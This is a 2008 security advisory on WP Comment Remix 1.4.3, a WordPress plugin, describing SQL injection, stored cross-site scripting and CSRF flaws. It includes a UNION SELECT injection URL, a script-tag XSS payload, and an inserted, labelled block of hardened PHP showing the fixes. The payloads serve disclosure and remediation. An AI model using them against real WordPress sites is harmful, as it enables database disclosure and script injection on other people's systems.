wpcomment-multi.txt

14 Oct 2008 | Reported by g30rg3_x | Type: packetstorm | Source: packetstormsecurity.com

WP Comment Remix 1.4.3 Multiple Vulnerabilities. Allows remote attackers to conduct SQL Injection, Cross-Site Scripting, and Cross-Site Request Forgery attacks

Code
`___________  
ChX Security |  
Advisory #3 |  
==========  
  
-> "WP Comment Remix 1.4.3 Multiple Vulnerabilities" <-  
  
_________________  
Advisory Information |  
===============  
Title: WP Comment Remix 1.4.3 Multiple Vulnerabilities  
Author: g30rg3_x <g30rg3x_at_chxsecurity_dot_org>  
Advisory URL: http://chxsecurity.org/advisories/adv-3-full.txt  
Date of last update: 2008-10-13  
CVE Name: --  
  
____________________  
Vulnerability Information |  
==================  
Software: WP Comment Remix  
Version: 1.4.3  
From: Remote  
Severity: Extremely Critical  
Impact:  
Manipulation of data  
Cross-Site Scripting  
Type of Advisory: Full Disclosure  
  
_________________  
Software Description |  
===============  
WP Comment Remix adds a plethora of new options and features to  
WordPress. From Reply and Quote links  
for commenters, to a full upgrade to the edit comments pages in the  
admin panel, WPCR will save you  
time and effort when running your blog.  
  
____________________  
Vulnerability Description |  
==================  
WP Comment Remix has multiple vulnerabilities which allow remote  
attackers to conduct SQL Injection,  
Cross-Site Scripting and Cross-Site Request Forgery attacks.  
The SQL Injection is possible due to the lack of filtering on the  
comment post ID variable in the AJAX  
Comments script.  
The Cross-Site Scripting is possible due to the lack of filtering and  
escaping on several stored  
options.  
The Cross-Site Request Forgery is caused by the absence of WordPress  
nonces on the options panel form.  
  
__________________  
Technical Description |  
================  
* SQL Injection *  
Inside the script "ajax_comments.php" (around lines 27 to 29):  
  
/---------------------  
$id = $_GET['p'];  
  
$comments = $wpdb->get_results("SELECT * FROM $wpdb->comments WHERE  
comment_post_ID = $id AND comment_approved != 'spam' ORDER BY  
comment_date DESC");  
----------------------/  
As the presented code shows, the value of $id is taken directly from the  
HTTP GET parameter p and then interpolated into the SQL query passed to  
the get_results method of the $wpdb object (which lets WordPress plugin  
developers pull multiple rows from the database), so SQL code can be  
injected and the injected data will later be shown as comment data by  
the script.  
  
As an example, something like this can be injected:  
/----------------------  
ajax_comments.php?p=0 UNION SELECT  
1,2,user(),4,5,6,7,8,CONCAT(database(),0x3C62723E,version()),10,11,12,13,14,15  
--  
-----------------------/  
to obtain the MySQL user, database name and MySQL version used on the server.  
  
  
  
* Cross-Site Scripting *  
Inside the script "wpcommentremix.php" (around lines 611 to 781):  
  
(The next code is truncated to only show the vulnerable parts of the code)  
/----------------------  
$options['replytotext'] = $_POST['replytotext'];  
...  
$options['quotetext'] = $_POST['quotetext'];  
$options['originallypostedby'] = $_POST['originallypostedby'];  
$options['sep'] = $_POST['sep'];  
$options['maxtags'] = $_POST['maxtags'];  
...  
$options['tagsep'] = $_POST['tagsep'];  
$options['tagheadersep'] = $_POST['tagheadersep'];  
$options['taglabel'] = $_POST['taglabel'];  
$options['tagheaderlabel'] = $_POST['tagheaderlabel'];  
...  
<input type="text" name="replytotext" value="<?=$options['replytotext']?>"><br/>  
...  
<input type="text" name="quotetext" value="<?=$options['quotetext']?>"><br/>  
...  
<input type="textbox" name="originallypostedby"  
value='<?=$options['originallypostedby'];?>' />  
...  
<input type="text" name="sep" value="<?=$options['sep']?>"><br/>  
...  
<input type="text" name="taglabel" value="<?=$options['taglabel']?>"><br/>  
...  
<input type="text" name="tagsep" value="<?=$options['tagsep']?>"><br/>  
...  
<input type="text" name="maxtags" value="<?=$options['maxtags']?>"><br/>  
...  
<input type="text" name="tagheaderlabel"  
value="<?=$options['tagheaderlabel']?>"><br/>  
...  
<input type="text" name="tagheadersep"  
value="<?=$options['tagheadersep']?>"><br/>  
-----------------------/  
These variables completely lack filtering and escaping, so if something  
like this is stored...  
  
/----------------------  
5"><script>alert(String.fromCharCode(88,83,83));</script><input  
type=hidden name=foo id="  
-----------------------/  
when the data is retrieved to be shown on the dashboard options panel,  
the injected markup is rendered and the attack is carried out.  
  
NOTE: Some of these options (such as replytotext) are also rendered to  
public visitors, so the injection is not confined to the plugin's  
dashboard options panel.  
  
  
  
* Cross-Site Request Forgery *  
The form generated by the wpcr_do_options_page function  
(wpcommentsremix.php at line 585) contains no WordPress nonce (which is  
what prevents this type of attack); it relies only on a simple hidden  
input named "wpcr_hidden_form_input" with the value "1".  
An attacker can therefore force a logged-in user to submit data to the  
form, and combined with the Cross-Site Scripting vulnerability discussed  
above this makes the issue very dangerous.  
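Hardened versions of the three spots described above (the AJAX comment query, the options save handler and the options form), as an added example that is not the plugin's or the advisory author's code. It uses current WordPress core functions ($wpdb->prepare, check_admin_referer, wp_nonce_field, sanitize_text_field, esc_attr), some of which postdate the 2008 plugin; the wpcr_safe_ function names, the nonce action 'wpcr_save_options' and the option key 'wpcr_options' are assumptions.

```php
<?php
// Added example, not the plugin's code: hardened versions of the three spots the advisory
// cites. Names prefixed wpcr_safe_, the nonce action and the option key are assumptions.
// 1. ajax_comments.php: bind the post ID as an integer instead of interpolating $_GET['p'].
function wpcr_safe_get_comments() {
    global $wpdb;
    $id = isset($_GET['p']) ? absint($_GET['p']) : 0;
    if ($id === 0 || get_post_status($id) !== 'publish') {
        wp_die('Invalid post', '', array('response' => 400));
    }
    // %d is an integer placeholder, so the UNION payload from the advisory never reaches the query.
    $sql = $wpdb->prepare(
        "SELECT * FROM $wpdb->comments WHERE comment_post_ID = %d"
        . " AND comment_approved != 'spam' ORDER BY comment_date DESC",
        $id
    );
    return $wpdb->get_results($sql);
}

// 2. Options save: require the capability and a valid nonce, then sanitize before storing.
function wpcr_safe_save_options() {
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions', '', array('response' => 403));
    }
    check_admin_referer('wpcr_save_options', 'wpcr_nonce'); // dies on a missing or forged nonce
    $text_fields = array('replytotext', 'quotetext', 'originallypostedby', 'sep',
                         'tagsep', 'tagheadersep', 'taglabel', 'tagheaderlabel');
    $options = array();
    foreach ($text_fields as $field) {
        $options[$field] = isset($_POST[$field]) ? sanitize_text_field(wp_unslash($_POST[$field])) : '';
    }
    $options['maxtags'] = isset($_POST['maxtags']) ? absint($_POST['maxtags']) : 0;
    update_option('wpcr_options', $options);
}

// 3. Options form: emit the nonce field and escape every stored value on output.
function wpcr_safe_options_form() {
    $options = get_option('wpcr_options', array());
    echo '<form method="post">';
    wp_nonce_field('wpcr_save_options', 'wpcr_nonce');
    foreach (array('replytotext', 'quotetext', 'originallypostedby', 'sep', 'maxtags',
                   'tagsep', 'tagheadersep', 'taglabel', 'tagheaderlabel') as $field) {
        $value = isset($options[$field]) ? $options[$field] : '';
        // esc_attr() renders the advisory's 5"><script>... payload as inert text inside the attribute.
        printf('<input type="text" name="%s" value="%s"><br/>', esc_attr($field), esc_attr($value));
    }
    submit_button();
    echo '</form>';
}
```

sanitize_text_field() strips tags, so a field that is meant to carry markup (the separator options may be such a case) would need wp_kses() with an explicit allow-list instead. The nonce and capability checks must run before any option is written, not after.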
  
______________  
Proof of Concept |  
=============  
Can be downloaded from here:  
http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip  
  
_______  
Solution |  
======  
Upgrade to version 1.4.4  
  
_______  
Timeline |  
=======  
Bug Found: 16/09/2008  
Vendor Contact: 20/09/2008  
Vendor Response: 23/09/2008  
Public Disclosure: 13/10/2008  
  
  
ChX Security  
http://chxsecurity.org/  
(c) 2008  
  
--  
Original: http://chxsecurity.org/advisories/adv-3-full.txt  
`
